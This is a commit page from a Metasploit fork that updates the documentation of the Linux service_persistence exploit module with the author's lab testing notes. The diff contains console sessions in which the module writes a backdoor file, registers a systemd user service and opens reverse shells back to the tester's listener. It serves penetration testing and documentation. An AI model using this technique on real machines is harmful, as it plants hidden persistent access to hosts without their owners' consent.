adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update module doc with my testing notes

Browse Source
This commit is contained in:
William Vu
2019-03-06 00:47:12 -06:00
parent 31ba073009
commit a6782cbee4
1 changed files with 23 additions and 35 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/service_persistence.md
+23 -35
View File
@@ -5,9 +5,10 @@
1. Kali 2.0 (System V)
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Centos 5 (System V)
5. Fedora 18 (systemd)
6. Fedora 20 (systemd)
4. Ubuntu 16.04 (systemd user)
5. Centos 5 (System V)
6. Fedora 18 (systemd)
7. Fedora 20 (systemd)
## Verification Steps
@@ -253,16 +254,16 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
### systemd user
### systemd (Ubuntu 16.04 Server - vagrant)
msf5 exploit(linux/local/service_persistence) > show options
msf5 exploit(linux/local/service_persistence) > options
Module options (exploit/linux/local/service_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
SERVICE no Name of service to create
SESSION 1 yes The session to run this module on.
SESSION -1 yes The session to run this module on.
SHELLPATH /tmp yes Writable path to put our shell
SHELL_NAME no Name of shell file to write
@@ -271,8 +272,8 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
LHOST 172.28.128.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
@@ -285,33 +286,20 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
msf5 exploit(linux/local/service_persistence) > run
[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
5:45:16 -0500
id
uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf5 exploit(linux/local/service_persistence) > set VERBOSE true
VERBOSE => true
msf5 exploit(linux/local/service_persistence) > run
[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Writing backdoor to /tmp/iEucd
[*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: uKxHqmV
[*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
5:45:30 -0500
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
echo hi lennart
hi lennart
exit
[*] 127.0.0.1 - Command shell session 3 closed.
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux